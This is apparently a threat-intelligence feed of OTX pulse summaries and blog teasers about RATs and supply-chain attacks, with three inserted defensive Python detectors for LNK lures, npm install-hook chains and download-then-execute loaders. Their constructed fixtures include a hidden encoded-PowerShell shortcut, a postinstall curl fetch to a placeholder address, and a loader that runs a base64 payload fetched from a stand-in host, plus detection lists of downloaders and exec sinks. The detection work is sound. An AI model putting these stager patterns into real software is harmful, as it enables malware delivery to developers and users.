Mirax RAT Exploits Meta Apps to Infiltrate Android Devices

Beware of fake ads on Meta apps - a sneaky new malware called Mirax RAT is using them to secretly take control of Android devices, with a focus on Spanish-speaking nations. This remote access Trojan is part of a growing Malware-as-a-Service economy that's putting unsuspecting users at risk.

https://osintsights.com/mirax-rat-exploits-meta-apps-to-infiltrate-android-devices?utm_source=mastodon&utm_medium=social

#MiraxRat #Malwareasaservice #MetaApps #AndroidMalware #RemoteAccessTrojan

Learn how Mirax RAT exploits Meta apps to infiltrate Android devices via deceptive ads and take control. Discover the malware's tactics and protect your device now effectively.

OSINTSights

Mirax RAT Exploits Meta Ads to Hijack 220,000 Devices

Meet Mirax RAT, a sneaky Android malware that's hijacked over 220,000 devices by exploiting Meta Ads, giving strangers full control over unsuspecting users' phones. This malicious code has rapidly spread to hundreds of thousands of social accounts, showcasing the alarming power of mainstream ad platforms in the wrong hands.

https://osintsights.com/mirax-rat-exploits-meta-ads-to-hijack-220000-devices?utm_source=mastodon&utm_medium=social

#MiraxRat #AndroidMalware #RemoteAccessTrojan #SocialEngineering #MetaAds

Learn how Mirax RAT hijacks 220,000 devices via Meta Ads. Discover the threat and protect your device now with expert insights on this Android malware campaign.

OSINTSights

March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day

In March 2026, 31 high-impact vulnerabilities were identified requiring prioritization for remediation, with 29 receiving Very Critical Risk Scores. Affected vendors included Cisco, Microsoft, Google, ConnectWise, and others, with Microsoft and Apple accounting for approximately 32% of vulnerabilities. Notably, the Interlock Ransomware Group exploited CVE-2026-20131, a zero-day deserialization vulnerability in Cisco Secure Firewall Management Center, as early as January 2026 to compromise enterprise networks. The group deployed custom remote access trojans and facilitated ransomware operations through crafted HTTP requests executing arbitrary Java code as root. Additional campaigns involved the DarkSword iOS exploit kit delivering GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads, and the Coruna exploit kit deploying PlasmaLoader malware. Nine vulnerabilities enabled remote code execution across multiple platforms. One vulnerability dated back nine years, emphasizing continued exploitation of legacy unpatched

Pulse ID: 69de0077cbff2dc8d99b17ff
Pulse Link: https://otx.alienvault.com/pulse/69de0077cbff2dc8d99b17ff
Pulse Author: AlienVault
Created: 2026-04-14 08:53:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cisco #ConnectWise #CyberSecurity #Google #HTTP #InfoSec #Java #Malware #Microsoft #OTX #OpenThreatExchange #RAT #RansomWare #RemoteAccessTrojan #RemoteCodeExecution #Trojan #Vulnerability #Word #ZeroDay #bot #iOS #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

REFUNDEE: Inside a Shadow Panel Phishing-as-a-Service Operation

An open directory discovery at refundonex[.]com exposed a complete Phishing-as-a-Service and RAT-as-a-Service platform targeting Spanish and Portuguese-speaking victims. The investigation uncovered 3,788 files including weaponized LNK, VBS, and AES-encrypted PowerShell payloads delivering a remote access trojan. The platform, called Shadow Panel, operates from Bulgarian infrastructure and offers capabilities including remote shell execution, screenshot capture, file management, browser credential theft, clipboard hijacking for cryptocurrency wallets, and multi-operator support. The C2 panel's frontend JavaScript was publicly accessible, revealing 29 API endpoints and the complete architecture. Infrastructure analysis linked the operation to nikola4010@proton[.]me through WHOIS data and historical malicious domain associations dating back to 2021, indicating a long-running cybercriminal operation with minimal detection coverage.

Pulse ID: 69dd066f59e22e6d1ee7315b
Pulse Link: https://otx.alienvault.com/pulse/69dd066f59e22e6d1ee7315b
Pulse Author: AlienVault
Created: 2026-04-13 15:06:23

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Bulgaria #Clipboard #CyberSecurity #Endpoint #InfoSec #Java #JavaScript #LNK #Nim #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #RemoteAccessTrojan #Trojan #VBS #bot #cryptocurrency #AlienVault

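
The pulse above names weaponized LNK files as the first stage of the Shadow Panel delivery chain. Shortcut lures are cheap to triage statically: the launch target and its arguments sit in the shortcut's StringData section, and the switches a stager needs (hidden window, encoded command, policy bypass) are visible there before anything runs. The following is an added example, not code from the REFUNDEE write-up or the platform it describes. It serialises a constructed shortcut in memory following the MS-SHLLINK layout (76-byte header, optional LinkTargetIDList and LinkInfo, then StringData in fixed order) and parses it back; the sample paths and arguments are invented for illustration.

```python
"""Triage of Windows shortcut (.lnk) lures: parse StringData and flag interpreter abuse.

Added example, not from the REFUNDEE write-up. Builds a constructed shortcut in
memory (there is no real sample here) and extracts the fields that matter for
phishing triage: the launch target, its command-line arguments and ShowCommand.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [  # StringData order mandated by the spec, with the LinkFlags bit enabling each
    ("name", 0x04),
    ("relative_path", 0x08),
    ("working_dir", 0x10),
    ("arguments", 0x20),
    ("icon_location", 0x40),
]
SW_SHOWMINNOACTIVE = 7  # launch minimised: common in lures so the console never shows

SUSPICIOUS = [
    (re.compile(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32", re.I),
     "script interpreter or LOLBin target"),
    (re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass|executionpolicy\s+bypass", re.I),
     "hidden window / policy bypass switches"),
    (re.compile(r"https?://|\\\\[\w.]+\\", re.I), "remote or UNC payload location"),
]


def build_lnk(show_command=1, **fields):
    """Serialise a minimal Unicode shortcut from the given StringData fields."""
    flags, body = IS_UNICODE, b""
    for name, bit in STRING_FIELDS:
        if name in fields:
            flags |= bit
            # CountCharacters (2 bytes) followed by UTF-16LE characters, no terminator
            body += struct.pack("<H", len(fields[name])) + fields[name].encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and StringData, skipping the structures triage does not need."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    off = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:  # IDListSize (2 bytes) + ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:           # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def triage(fields: dict) -> list:
    """Return human-readable reasons a shortcut looks like a dropper (empty list if clean)."""
    reasons = []
    launch = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    for pattern, label in SUSPICIOUS:
        if pattern.search(launch):
            reasons.append(label)
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised on launch")
    return reasons


# Constructed samples: a PowerShell stager dressed up as a document, and a plain file shortcut.
SAMPLE_LURE = build_lnk(
    show_command=SW_SHOWMINNOACTIVE,
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-nop -w hidden -enc SQBFAFgA",
    icon_location=r"%SystemRoot%\System32\shell32.dll",
)
SAMPLE_BENIGN = build_lnk(relative_path=r"..\Documents\report.docx")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        fields = parse_lnk(blob)
        print(label, fields.get("relative_path"), fields.get("arguments"), triage(fields))
```

The parser only walks far enough to reach StringData; a real sample will usually also carry a LinkTargetIDList and LinkInfo, which the offset arithmetic skips by size, and may carry ExtraData blocks after StringData, which this code never reads. The regexes are a starting point, not a signature set: a lure that launches cmd.exe with a benign-looking batch file and stages PowerShell from there will only trip the first pattern.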

Fake recruiter campaign targets crypto developers with RAT

A sophisticated fake recruitment campaign named 'graphalgo' has been active since May 2025, targeting JavaScript and Python developers in the cryptocurrency sector. Attackers approach victims through LinkedIn, Facebook, and Reddit with fabricated job opportunities from fake blockchain companies like Veltrix Capital. The campaign uses malicious dependencies hidden in npm and PyPI packages, delivered through coding test repositories on GitHub. Notable is the bigmathutils package that accumulated over 10,000 downloads before its malicious version was released. The operation deploys a remote access trojan (RAT) with token-protected C2 communication, file manipulation capabilities, and functionality to detect the Metamask browser extension, indicating focus on cryptocurrency theft. The modular campaign design allows threat actors to maintain backend infrastructure while easily replacing compromised frontend elements.

Pulse ID: 69dd073f50edefa3e44adec6
Pulse Link: https://otx.alienvault.com/pulse/69dd073f50edefa3e44adec6
Pulse Author: AlienVault
Created: 2026-04-13 15:09:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #Browser #CyberSecurity #Facebook #GitHub #InfoSec #Java #JavaScript #LinkedIn #NPM #OTX #OpenThreatExchange #PyPI #Python #RAT #RemoteAccessTrojan #Trojan #bot #cryptocurrency #developers #AlienVault


ASO RAT: Arabic-Language Android Surveillance Platform Targeting Syria

ASO RAT is a custom Android Remote Access Trojan featuring comprehensive device compromise capabilities including SMS interception, camera access, GPS tracking, call logging, file exfiltration, and DDoS functionality. Operating from Frankfurt-based infrastructure with connections to Syria, the platform disguises itself as PDF readers and Syrian government applications. Investigation revealed two active C2 servers, four DDNS domains, eight malicious APK samples with the newest achieving 0/66 antivirus detections, and complete reverse-engineered panel architecture exposing 21 API endpoints. The multi-user panel with role-based access control suggests RAT-as-a-Service operations. Infrastructure includes historical VPS providers and Starlink satellite connections geolocated to Syria. The developer's Arabic-language interface and Syria-themed lures indicate targeting of opposition figures, journalists, and military personnel within the Syrian conflict theater.

Pulse ID: 69dd062fb9ecc388e52457d3
Pulse Link: https://otx.alienvault.com/pulse/69dd062fb9ecc388e52457d3
Pulse Author: AlienVault
Created: 2026-04-13 15:05:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APK #Android #Arabic #CyberSecurity #DDoS #DNS #DoS #ELF #Endpoint #Government #InfoSec #Military #OTX #OpenThreatExchange #PDF #RAT #RCE #RemoteAccessTrojan #SMS #Syria #Trojan #bot #AlienVault


A new Android RAT turning infected devices into potential residential proxy nodes

Mirax is a newly identified Android Remote Access Trojan operating as Malware-as-a-Service, actively targeting European users, particularly in Spanish-speaking regions. Distributed through Meta advertisements and GitHub-hosted droppers, the malware has reached over 200,000 accounts. It employs sophisticated techniques including dynamically fetched HTML overlays, comprehensive keylogging, and remote device control capabilities. A distinctive feature is its integration of SOCKS5-based residential proxy functionality, transforming infected devices into proxy nodes that enable attackers to route traffic through legitimate residential IP addresses. This capability allows operators to bypass geolocation restrictions and evade fraud detection systems while conducting account takeovers and transaction fraud. The malware uses commercial-grade obfuscation through Golden Encryption and establishes persistence through Accessibility Service abuse.

Pulse ID: 69dcfd5f0b3e3ab70a58831d
Pulse Link: https://otx.alienvault.com/pulse/69dcfd5f0b3e3ab70a58831d
Pulse Author: AlienVault
Created: 2026-04-13 14:27:43

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #CyberSecurity #Encryption #Europe #GitHub #HTML #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #Proxy #RAT #RemoteAccessTrojan #Trojan #bot #AlienVault


NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the company's lead developer. Malicious versions ([email protected] and [email protected]) were published containing a hidden dependency that executed postinstall scripts during npm installation. This automated execution downloaded and deployed a remote access trojan on affected systems without requiring user interaction, making it particularly dangerous for developer environments and CI/CD pipelines. The compromise resulted in full remote access capabilities, potential credential exposure including API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains involving npm spawning command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault

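
The pulse above describes the two places this compromise is catchable: before installation, in the lifecycle hooks a dependency declares, and at runtime, in the process chain where npm spawns a shell that spawns a download utility with an outbound connection. The following is an added example, not code from the OTX pulse or from the Axios project. The event schema (key=value pairs joined by " | ") is a constructed stand-in for whatever process and network telemetry an EDR or auditd pipeline emits, and the sample events and manifest are invented.

```python
"""Process-chain detection for npm lifecycle scripts that fetch and run payloads.

Added example, not from the OTX pulse or the Axios project. The event format,
the sample telemetry and the sample package.json below are all constructed.
"""
from dataclasses import dataclass, field

PACKAGE_MANAGERS = {"npm", "npx", "node", "yarn", "pnpm"}
SHELLS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    connections: list = field(default_factory=list)  # (dst, dport) pairs


def parse_events(lines):
    """Build a pid -> Proc map from constructed process and network events."""
    procs = {}
    for line in lines:
        kv = dict(tok.split("=", 1) for tok in line.split(" | "))
        if kv["type"] == "process":
            pid = int(kv["pid"])
            procs[pid] = Proc(pid, int(kv["ppid"]), kv["image"], kv["cmdline"])
        elif kv["type"] == "network" and int(kv["pid"]) in procs:
            procs[int(kv["pid"])].connections.append((kv["dst"], int(kv["dport"])))
    return procs


def ancestry(procs, pid):
    """Walk parent pointers, leaf first; the seen-set guards against pid-reuse loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def find_install_chains(procs):
    """Flag downloaders whose ancestry contains both a shell and a package manager.

    npm runs every lifecycle script through sh, so a shell under npm is normal;
    the signal is a download utility at the leaf of that chain, ideally with an
    outbound connection attributed to it.
    """
    findings = []
    for proc in procs.values():
        if proc.image not in DOWNLOADERS:
            continue
        chain = ancestry(procs, proc.pid)
        ancestors = [p.image for p in chain[1:]]
        if any(i in SHELLS for i in ancestors) and any(i in PACKAGE_MANAGERS for i in ancestors):
            findings.append({
                "pid": proc.pid,
                "chain": " -> ".join(p.image for p in reversed(chain)),
                "cmdline": proc.cmdline,
                "connections": proc.connections,
            })
    return findings


def lifecycle_scripts(package_json: dict) -> dict:
    """Return the install-time hooks a package.json declares (pre-install audit)."""
    hooks = {"preinstall", "install", "postinstall", "prepare"}
    return {k: v for k, v in package_json.get("scripts", {}).items() if k in hooks}


# Constructed telemetry: a postinstall hook fetching a stage from a TEST-NET address,
# plus a developer's own curl from an interactive shell that must not be flagged.
SAMPLE_EVENTS = [
    "type=process | pid=100 | ppid=1 | image=bash | cmdline=bash",
    "type=process | pid=101 | ppid=100 | image=npm | cmdline=npm install",
    "type=process | pid=102 | ppid=101 | image=sh | cmdline=sh -c node scripts/postinstall.js",
    "type=process | pid=103 | ppid=102 | image=node | cmdline=node scripts/postinstall.js",
    "type=process | pid=104 | ppid=103 | image=sh | cmdline=sh -c curl -s http://198.51.100.7/s -o /tmp/.s",
    "type=process | pid=105 | ppid=104 | image=curl | cmdline=curl -s http://198.51.100.7/s -o /tmp/.s",
    "type=network | pid=105 | dst=198.51.100.7 | dport=80",
    "type=process | pid=200 | ppid=100 | image=curl | cmdline=curl -sI https://registry.npmjs.org/",
    "type=network | pid=200 | dst=203.0.113.9 | dport=443",
]

SAMPLE_PACKAGE_JSON = {  # constructed manifest carrying an install hook
    "name": "example-dep",
    "scripts": {"test": "node test.js", "postinstall": "node scripts/postinstall.js"},
}

if __name__ == "__main__":
    for hit in find_install_chains(parse_events(SAMPLE_EVENTS)):
        print(hit)
    print("install hooks:", lifecycle_scripts(SAMPLE_PACKAGE_JSON))
```

For CI runners and build containers the blunt preventive control is `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), which suppresses every lifecycle hook and therefore breaks packages that genuinely need a build step; the audit function above is the compromise, listing which dependencies would have run something so they can be reviewed rather than blindly skipped.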

New Trojan STX RAT Targets Finance Sector with Sophisticated Stealth Methods

Meet STX RAT, a sneaky new remote access trojan that's got its sights set on the finance sector, using advanced stealth methods and command-and-control capabilities to evade detection. This latest threat is a wake-up call for defenders, testing their readiness to respond to increasingly sophisticated attacks.

https://osintsights.com/new-trojan-stx-rat-targets-finance-sector-with-sophisticated-stealth-methods?utm_source=mastodon&utm_medium=social

#RemoteAccessTrojan #StxRat #FinanceSector #EmergingThreats #AdvancedPersistentThreat

Discover how STX RAT targets finance sector with advanced stealth methods and learn how to bolster your defenses against this sophisticated threat now.

OSINTSights

North Korea's Contagious Interview Campaign Spreads Across 5 Ecosystems, Delivering Staged RAT Payloads

A North Korean threat operation has published malicious packages across npm, PyPI, Go Modules, crates.io, and Packagist, impersonating legitimate developer tooling. The campaign uses GitHub aliases including golangorg and aokisasakidev to distribute staged malware loaders that contact actor-controlled infrastructure, retrieve payloads from Google Drive, and deliver platform-specific second-stage malware. The loaders are hidden behind normal-looking API functions in logging and utility libraries. Windows variants include full remote access trojans with capabilities for shell execution, keylogging, browser and wallet theft, sensitive file collection, and AnyDesk deployment. The operation demonstrates coordinated cross-ecosystem supply chain attacks with shared infrastructure patterns, reused extraction directories, and consistent staging logic across multiple programming languages.

Pulse ID: 69d61d25c472b8eb580c2996
Pulse Link: https://otx.alienvault.com/pulse/69d61d25c472b8eb580c2996
Pulse Author: AlienVault
Created: 2026-04-08 09:17:25

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AnyDesk #Browser #CyberSecurity #GitHub #Golang #Google #InfoSec #Korea #Malware #NPM #NorthKorea #OTX #OpenThreatExchange #PyPI #RAT #RemoteAccessTrojan #SupplyChain #Trojan #Troll #Windows #bot #AlienVault

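
Both the graphalgo fake-recruiter post earlier on this page and the Contagious Interview pulse above describe the same shape of package: a loader hidden behind a normal-looking function in a logging or utility library, which fetches a second stage from remote infrastructure and executes it. That shape is visible statically. The following is an added example, not code from either write-up or from any of the named packages; it scans the Python (PyPI) side only, using the standard ast module, and the "logging helper" module it scans is constructed for illustration, including its example.invalid URL.

```python
"""Static triage of a Python package for download-then-execute loaders.

Added example, not from either write-up above. Walks every top-level function
with the ast module and flags functions that combine a network fetch, an
optional decode step and a code-execution sink, then records which
benign-looking entry points call the flagged function. Sample module is constructed.
"""
import ast

NETWORK_CALLS = {
    "urllib.request.urlopen", "request.urlopen", "urlopen",
    "urllib.request.urlretrieve", "urlretrieve",
    "requests.get", "requests.post", "httpx.get", "httpx.post",
    "http.client.HTTPSConnection", "http.client.HTTPConnection",
}
EXEC_SINKS = {
    "exec", "eval", "compile", "__import__", "importlib.import_module",
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output", "marshal.loads",
}
DECODERS = {"base64.b64decode", "b64decode", "zlib.decompress", "codecs.decode"}


def call_name(node: ast.Call) -> str:
    """Dotted name of a call target, or '' for call results and computed attributes."""
    parts, target = [], node.func
    while isinstance(target, ast.Attribute):
        parts.append(target.attr)
        target = target.value
    if not isinstance(target, ast.Name):
        return ""
    parts.append(target.id)
    return ".".join(reversed(parts))


def classify_calls(fn: ast.AST) -> dict:
    """Bucket every call inside a function body by the role it could play in a loader."""
    hits = {"network": set(), "decode": set(), "sink": set()}
    for node in ast.walk(fn):
        if not isinstance(node, ast.Call):
            continue
        name = call_name(node)
        for bucket, names in (("network", NETWORK_CALLS), ("decode", DECODERS), ("sink", EXEC_SINKS)):
            if name in names:
                hits[bucket].add(name)
    return hits


def scan_module(source: str, filename: str = "<module>") -> dict:
    """Map flagged function name -> verdicts, matched calls, and one hop of callers."""
    tree = ast.parse(source, filename)
    funcs = {n.name: n for n in tree.body if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef))}
    findings = {}
    for name, fn in funcs.items():
        hits = classify_calls(fn)
        verdicts = []
        if hits["network"] and hits["sink"]:
            verdicts.append("download-then-execute")
        if hits["decode"] and hits["sink"]:
            verdicts.append("decode-then-execute")
        if verdicts:
            findings[name] = {"verdicts": verdicts, "reachable_from": [],
                              **{k: sorted(v) for k, v in hits.items()}}
    # The loader is usually private; record which public-looking functions reach it.
    for name, fn in funcs.items():
        callees = {call_name(n) for n in ast.walk(fn) if isinstance(n, ast.Call)}
        for flagged in findings:
            if flagged in callees and flagged != name:
                findings[flagged]["reachable_from"].append(name)
    return findings


# Constructed "logging helper" whose public log_event() quietly reaches a staged loader.
SAMPLE_MODULE = '''
import base64, json, logging, urllib.request

def configure(level="INFO"):
    logging.basicConfig(level=level)

def log_event(event):
    logging.getLogger("app").info(json.dumps(event))
    _sync()

def _sync():
    blob = urllib.request.urlopen("https://example.invalid/cfg").read()
    exec(compile(base64.b64decode(blob), "<cfg>", "exec"))

def parse(text):
    return json.loads(text)
'''

if __name__ == "__main__":
    for func, info in scan_module(SAMPLE_MODULE, "logger.py").items():
        print(func, info)
```

The match is on dotted names, so a loader that assembles its sink with getattr(builtins, "ex" + "ec"), imports modules from string fragments, or nests the fetch inside a class method or closure will slip past this pass; treat a hit as grounds for manual review and a miss as no information. For the npm side of the same campaigns the equivalent scan needs a JavaScript parser, and in both ecosystems it belongs alongside a review of install hooks (setup.py cmdclass, package.json lifecycle scripts), which run before any of this code is ever imported.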